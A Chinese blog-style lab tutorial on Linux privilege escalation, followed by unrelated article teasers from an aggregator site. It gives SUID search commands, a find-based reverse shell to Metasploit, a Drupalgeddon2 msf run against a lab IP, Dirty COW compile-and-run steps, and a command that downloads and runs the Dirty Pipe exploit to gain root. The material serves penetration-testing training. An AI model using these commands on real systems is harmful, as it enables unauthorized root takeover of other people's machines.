当前位置：首页 > news >正文

第103天：权限提升-Linux 系统辅助项目脏牛Dirty内核漏洞SUIDGUID

news 2025/12/15 16:26:18

项目下载地址

综合类探针：

https://github.com/liamg/traitor

自动化提权：

https://github.com/AlessandroZ/BeRoot

信息收集：

https://github.com/rebootuser/LinEnum

https://github.com/sleventyeleven/linuxprivchecker

漏洞探针：

https://github.com/mzet-/linux-exploit-suggester

https://github.com/jondonas/linux-exploit-suggester-2

二进制文件提权命令查询平台：

Linux：https://gtfobins.github.io/

Windows：https://lolbas-project.github.io

案例一： Linux-配置安全 SUID 提权探针&利用

首先先查找suid权限的命令

find / -user root -perm -4000 -print 2>/dev/null
find / -type f -perm /u=s 2>/dev/null

或者上传项目进行检测，项目地址

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

执行该脚本并将其写入1.txt，利用vim查找

除此之外该脚本还可以帮你去查询一些敏感文件的信息

如何利用？

网站：GTFOBins

SUID Executables – Penetration Testing Lab

利用该网站查找对应的命令，如果后面有suid说明可以利用suid进行提权

find命令在执行的时候后面可以跟-exec,在这个过程中你的身份就是root，可以利用root反弹shell

利用冰蝎进行连接然后反弹shell给msf，msf配置按照冰蝎写的进行配置

msf配置完成开启监听

find提权时需要注意的点

这个时候获得了反弹的权限

提权

案例二： Linux-内核漏洞本地用户提权-探针&利用-墨者

靶场环境：（新注册的用户有免费的12墨币^_^）Ubuntu 16.04漏洞复现(CVE-2017-16995)_主机安全_在线靶场_墨者学院_专注于网络安全人才培养

下载后连接

上传漏洞检测的脚本，脚本下载地址：https://github.com/The-Z-Labs/linux-exploit-suggester

上传加执行权限进行执行

检测出来很多漏洞

而且该工具里面直接有exp的下载地址

下载好后上传服务器，里面有运行方式

上传后编译，然后执行

案例三: Linux-内核漏洞 Web 用户提权-探针&利用-脏牛

靶机下载地址：

链接：https://pan.baidu.com/s/1m8XLp26yOJbrZw8H5HR-Tw?pwd=ii5m
提取码：ii5m

开启靶机用nmap扫描ip

端口全扫描

访问页面

drupal版本为drupal7

msf寻找drupal

利用工具

use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.172.130
set rport 1898
run

meter命令行可以利用upload命令进行文件上传

进入shell下tmp下给目标加上执行权限，执行，可以查看漏洞

这里利用的是脏牛漏洞

从git上下载exp上传

编译执行

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
./dcow
su root

root密码被切换了

得到密码，ssh连接

案例四：Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe

影响版本

5.8 <= Linux内核版本 < 5.16.11 / 5.15.25 / 5.10.102

符合漏洞版本的kali

Index of /kali-images/kali-2022.2/

wget https://haxx.in/files/dirtypipez.c --no-check-certificate

gcc -o dirtypipez dirtypipez.c

./dirtypipez /usr/bin/su #任何具体suid权限的文件均可

第103天：权限提升-Linux 系统辅助项目脏牛Dirty内核漏洞SUIDGUID

项目下载地址综合类探针： https://github.com/liamg/traitor 自动化提权： https://github.com/AlessandroZ/BeRoot 信息收集： https://github.com/rebootuser/LinEnum https://github.com/sleventyeleven/linuxprivchecker 漏洞探针&#xf…...

编程日记 2024/6/9 20:14:49

如何用群晖当异地组网服务器？

在当今信息化时代，远程通信成为了企业和个人之间不可或缺的一部分。特别是对于跨地区的通信需求，一个可靠的异地组网服务器是必不可少的。而群晖（Synology）作为一款功能强大的网络存储设备，可以被用作办公室或家庭的异…...

编程日记 2024/6/9 20:13:48

文件怎么去重？5个技巧，教你删除重复文件！

一般来说，在处理大量文件时，你可能会遇到重复的类似文件。这些文件占据了电脑上不必要的磁盘空间，导致系统性能下降。而这些文件可以是不同类型的，如照片、视频、音频、存档、文档等。正因如此，您需要通过文件去重来删…...

编程日记 2024/6/9 20:12:47

标准发布实施 | 《村镇污水处理一体化集成装备技术规范》

根据《中华人民共和国标准化法》以及国家标准化管理委员会、民政部联合制定的《团体标准管理规定》，依据全国团体标准信息平台和《中华环保联合会团体标准管理办法（试行）》，全国团体标准《村镇污水处理一体化集成装备技术指南》&a…...

编程日记 2024/6/9 20:10:45

人工智能--教育领域的运用

文章目录 🐋引言 🐋个性化学习 🦈体现： 🦈技术解析： 🐋智能辅导与虚拟助手 🦈体现： 🦈技术解析： 🐋自动评分与评估 &#x1f…...

编程日记 2024/6/9 20:05:40

【设计模式深度剖析】【3】【行为型】【职责链模式】| 以购物中心客户服务流程为例加深理解

👈️上一篇:命令模式 | 下一篇:策略模式👉️ 设计模式-专栏👈️ 文章目录职责链模式定义英文原话直译如何理解呢？ 职责链模式的角色1. Handler（抽象处理者）2. ConcreteHandler（具体处理者…...

编程日记 2024/6/9 20:03:38

评价GPT-4的方案

评价GPT-4的方案引言：随着人工智能技术的不断发展，自然语言处理领域取得了显著的突破。其中，GPT-4作为最新的大型语言模型之一，备受关注。本方案旨在对GPT-4进行全面评价，包括其技术特点、性能表现、应用场景以及潜在的影响等方面。一、技术特点 1. 模型规模和参数数…...

编程日记 2024/6/9 20:02:37

LeetCode | 1624.两个相同字符之间的最长子字符串

这道题拿到手想法就是去双重遍历暴力解，对于每个字符，从后往前遍历字符串，找到从后往前一直到本次遍历的这个字符串这段子串中和这个字符串相同的字符位置，然后得到子字符串的长度，和ans存储的值做一个比较&#xff0c…...

编程日记 2024/6/9 20:01:36

【CS.AI】GPT-4o：重新定义人工智能的新标杆

文章目录 1 序言2 GPT-4o的技术亮点3 GPT-4o与前代版本的对比3.1 热门AI模型对比表格GPT-3.5GPT-4GPT-4oBERTT5 3.2 其他 4 个人体验与感受5 结论 1 序言嘿，大家好！今天要聊聊一个超级酷的AI新突破——GPT-4o！最近，OpenAI发布了…...

编程日记 2024/6/9 20:00:35

野火FPGA跟练（四）——串口RS232、亚稳态

目录简介接口与引脚通信协议亚稳态RS232接收模块模块框图时序波形RTL 代码易错点Testbench 代码仿真 RS232发送模块模块框图时序波形RTL 代码Testbench 代码仿真简介 UART：Universal Asynchronous Receiver/Transmitter，异步串行通信接口。发送数据时…...

编程日记 2024/6/9 19:58:33

Qt for Android 申请摄像头权限

步骤 1. 添加用户权限方式1: AndroidManifest.xml 中新增（不添加后面申请选项时不弹窗） 或者再Qt Creator中直接添加方式2: .pro 中引用multimedia 模块，编译时配置自动添加 <uses-permission android:name"android.permissi…...

编程日记 2024/6/9 19:57:32

AttributeError: FigureCanvasKivyAgg object has no attribute resize_event AttributeError: FigureCanvasKivyAgg object has no attribute resize_event 是一种常见的Python错误，当你试图访问一个对象（在这个例子中是 FigureCanvasKivyAgg 对象&am…...

编程日记 2024/6/9 19:53:28

ChatTTS 文字生成语言本地模型部署

ChatTTS部署官方信息 [ChatTTS首页](https://chattts.com/)搭建步骤 1、下载源码 git clone https://github.com/2noise/ChatTTS.git 2、按照环境 pip install torch ChatTTS pip install -r requirements.txt 3、下载模型 git clone https://www.modelscope.cn/pzc163/ch…...

编程日记 2024/6/9 19:51:27

多曝光融合算法（三）cv2.createAlignMTB()多曝光图像融合的像素匹配问题

文章目录 1.cv2.createAlignMTB() 主要是计算2张图像的位移，假设位移移动不大2.多曝光图像的aline算法：median thresold bitmap原理讲解3.图像拼接算法stitch4.多曝光融合工具箱 1.cv2.createAlignMTB() 主要是计算2张图像的位移，假设位移移动…...

编程日记 2024/6/9 19:48:23

C/C++｜类型推导中的模式匹配

在C11及以上的相关语法中，特别是在模版元编程的范式里，类型推导是了重中之重。在《Effective Modern C 》中第一章主要就是讲各种类型推导。当然了，谈到类型推导，我们不得不先搞懂类型推导中的模式匹配，这是基础&a…...

编程日记 2024/6/9 19:47:22

The 18th Northeast Collegiate Programming Contest（5/9/13）

心得赛中ac：5，目前ac：9，题目总数：13 中档可做题还是很多的，可惜遇到了难绷的queueforces， 最后15min才判出来，oi赛制5wa4遗憾离场，赛后把几个题都给调过了&#xff0…...

编程日记 2024/6/9 19:42:18

Vue前端在线预览文件插件

Vue前端在线预览文件插件一、使用场景 1.1.像文档资料等，只想让他人在线预览，但不能下载。此等场景需求可以用到此插件。二、此文档介绍两种插件 1.view.xdocin插件 (上线后免费几天，然后收费，添加作者后，可以延…...

编程日记 2024/6/9 19:41:16

【ai】Audio2Face

Audio2Face 简介 Audio2Face是英伟达Omniverse平台的一部分，它使用先进的AI技术来生成基于音频输入的逼真面部动画。这个技术主要利用深度学习模型来解析人声，进而驱动一个三维模型的面部表情。下面是Audio2Face工作流程的详细说明：预备阶段在使用Audio2Face之前，需要准…...

编程日记 2024/6/9 19:40:15